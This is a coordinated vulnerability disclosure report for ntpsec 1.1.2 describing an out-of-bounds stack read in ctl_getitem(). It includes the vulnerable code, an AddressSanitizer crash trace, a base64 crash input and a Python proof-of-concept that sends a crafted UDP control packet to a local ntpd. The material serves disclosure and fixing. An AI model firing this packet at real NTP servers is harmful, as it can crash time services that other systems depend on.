Out of bounds read in ctl_getitem() in ntp_control.c

Please note that I will publicly disclose this issue no later than January 14, 2019. 90 days from today.

There exists an out of bounds read in ctl_getitem. Code snippet:

2539   /* Scan the string in the packet until we hit comma or
2540    * EoB. Register position of first '=' on the fly. */
2541   for (tp = NULL, cp = reqpt; cp != reqend; ++cp) {      // <-- cp incremented out of bounds
2542     if (*cp == '=' && tp == NULL)                        // <-- cp dereferenced, reading uninitialised data                                                
2543       tp = cp;
2544     if (*cp == ',')
2545       break;
2546   }

Crash report:

root@h4xb0x:/home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2# uname -a
Linux h4xb0x 3.16.0-7-amd64 #1 SMP Debian 3.16.59-1 (2018-10-03) x86_64 GNU/Linux
root@h4xb0x:/home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2# sha256sum ../../bug1 
a3e54a033eea3c3f0a5c795aaa0d8c8b3f4cbb013760e3b1865afb20eb4347b0  ../../bug1
root@h4xb0x:/home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2# base64 ../../bug1
TgID7AAAAAAAAALHdGM9EACvLCwsLPoAAPoLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsG
CwvOCxQLCwsLCwsLCwsLCwsLCwshCwsLCwsLCwsLCwsLCwsLBgsLzgsLCwsLCwsLCwvk5OULCwsL
IAsLCwsLCws9Yz2sCwsLCy0nCwsLCwsLCwsLCwsLC4ALCwsLCwsLCwsLCwsLCwsLCwv/CwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsL
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsCCwsLCwsYCwsLCwsLCwsLCwsLAAAAAsd0Yz0QAK8sLCws
+gAA+gsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwYLC84LFAsLCwsLCwsLCwsLCwsLCyEL
CwsLCwsLCwsLCwsLCwsGCwvOCwsLCwsLCwsLC+Tk5QsLCwsgCwsLCwsLCz1jPawLCwsLLScLCwsL
CwsLCwsLCwsLgAsLCwsLCwsLCwsLCwsLCwsLC/8LCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwILCwsL
CxgLCwsLCwsLCwsLCwsLCwsLCwsLCwsOCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLSwsL
CwsLCwsLCwsLCwsLCwsLCwsLCzupSN0ABAsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCw4L
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwtLCwsLCwsLCwsLCwsLCwsLCwsLCwsLO6lI3QAE
CwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwc=
root@h4xb0x:/home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2# ASAN_SYMBOLIZER_PATH=/usr/bin/llvm-symbolizer-3.5 ./build/main/ntpd/ntpd -n & sleep 1; cat ../../bug1 > /dev/udp/127.0.0.1/5123[1] 18249
2018-10-16T20:36:59 ntpd[18249]: INIT: ntpd ntpsec-1.1.2 2018-10-15T18:34:38Z: Starting
2018-10-16T20:36:59 ntpd[18249]: INIT: Command line: ./build/main/ntpd/ntpd -n
2018-10-16T20:36:59 ntpd[18249]: INIT: precision = 0.131 usec (-23)
2018-10-16T20:36:59 ntpd[18249]: INIT: successfully locked into RAM
2018-10-16T20:36:59 ntpd[18249]: CONFIG: readconfig: parsing file: /etc/ntp.conf
restrict 0.0.0.0: KOD does nothing without LIMITED.
2018-10-16T20:36:59 ntpd[18249]: CONFIG: restrict 0.0.0.0: KOD does nothing without LIMITED.
2018-10-16T20:36:59 ntpd[18249]: CONFIG: restrict 0.0.0.0: notrap keyword is ignored.
restrict ::: KOD does nothing without LIMITED.
2018-10-16T20:36:59 ntpd[18249]: CONFIG: restrict ::: KOD does nothing without LIMITED.
2018-10-16T20:36:59 ntpd[18249]: CONFIG: restrict ::: notrap keyword is ignored.
2018-10-16T20:36:59 ntpd[18249]: INIT: Using SO_TIMESTAMPNS
2018-10-16T20:36:59 ntpd[18249]: IO: Listen and drop on 0 v6wildcard [::]:5123
2018-10-16T20:36:59 ntpd[18249]: IO: Listen and drop on 1 v4wildcard 0.0.0.0:5123
2018-10-16T20:36:59 ntpd[18249]: IO: Listen normally on 2 lo 127.0.0.1:5123
2018-10-16T20:36:59 ntpd[18249]: IO: Listen normally on 3 eth0 192.168.245.220:5123
2018-10-16T20:36:59 ntpd[18249]: IO: Listen normally on 4 eth0 192.168.245.131:5123
2018-10-16T20:36:59 ntpd[18249]: IO: Listen normally on 5 lo [::1]:5123
2018-10-16T20:36:59 ntpd[18249]: IO: Listen normally on 6 eth0 [fe80::50:56ff:fe38:d7b8%2]:5123
2018-10-16T20:36:59 ntpd[18249]: IO: Listening on routing socket on fd #23 for interface updates
2018-10-16T20:36:59 ntpd[18249]: statistics directory /var/NTP/ does not exist or is unwriteable, error No such file or directory
=================================================================
==18249==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffd426ef680 at pc 0x55b2240a8d45 bp 0x7ffd426ee9b0 sp 0x7ffd426ee9a8
READ of size 1 at 0x7ffd426ef680 thread T0
root@h4xb0x:/home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2#     #0 0x55b2240a8d44 in ctl_getitem /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntp_control.c:2542:7
    #1 0x55b22409b636 in read_sysvars /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntp_control.c:2804:22
    #2 0x55b22409b636 in read_variables /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntp_control.c:2866
    #3 0x55b22409767c in process_control /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntp_control.c:898:4
    #4 0x55b22406991b in receive /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntp_proto.c:676:3
    #5 0x55b22408695e in mainloop /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntpd.c:982:6
    #6 0x55b22408695e in ntpdmain /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntpd.c:911
    #7 0x55b22408695e in main /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntpd.c:426
    #8 0x7f5b8a657b44 in __libc_start_main /build/glibc-6V9RKT/glibc-2.19/csu/libc-start.c:287
    #9 0x55b22403a48c in _start (/home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/ntpd/ntpd+0x10348c)

Address 0x7ffd426ef680 is located in stack of thread T0 at offset 576 in frame
    #0 0x55b2240964bf in process_control /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntp_control.c:768

  This frame has 1 object(s):
    [32, 576) 'pkt_core' <== Memory access at offset 576 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
      (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow /home/magnus/projects/ntpsec/untouched/ntpsec-1.1.2/build/main/../../ntpd/ntp_control.c:2542 ctl_getitem
Shadow bytes around the buggy address:
  0x1000284d5e80: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 00 00
  0x1000284d5e90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000284d5ea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000284d5eb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000284d5ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x1000284d5ed0:[f3]f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3
  0x1000284d5ee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000284d5ef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000284d5f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000284d5f10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000284d5f20: 00 00 00 00 f1 f1 f1 f1 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  ASan internal:           fe
==18249==ABORTING

The following PoC exploit can be used to demonstrate the issue:

#!/usr/bin/env python
import sys
import socket

buf = ("\x4e\x02\x03\xec\x00\x00\x00\x00\x00\x00\x02\xc7\x74\x63\x3d\x10" +
       "\x00\xaf\x2c\x2c\x2c\x2c\xfa\x00\x00\xfa\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x06\x0b\x0b\xce\x0b\x14\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x21\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x06\x0b\x0b" +
       "\xce\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\xe4\xe4\xe5\x0b\x0b" +
       "\x0b\x0b\x20\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x3d\x63\x3d\xac\x0b\x0b" +
       "\x0b\x0b\x2d\x27\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x80\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\xff\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x02\x0b\x0b\x0b\x0b\x0b\x18\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x00\x00\x00\x02\xc7\x74\x63\x3d\x10\x00\xaf\x2c\x2c" +
       "\x2c\x2c\xfa\x00\x00\xfa\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x06\x0b\x0b\xce\x0b\x14\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x21\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x06\x0b\x0b\xce\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\xe4\xe4\xe5\x0b\x0b\x0b\x0b\x20\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x3d\x63\x3d\xac\x0b\x0b\x0b\x0b\x2d\x27" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x80\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\xff\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x02\x0b\x0b\x0b\x0b\x0b\x18\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0e\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x4b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x3b\xa9\x48\xdd\x00\x04\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0e\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x4b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x3b\xa9\x48\xdd\x00\x04\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b" +
       "\x0b\x07")

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(buf, ('127.0.0.1', 123))

Please note that I will publicly disclose this issue no later than January 14, 2019. 90 days from today.

Edited by Magnus Klaaborg Stubman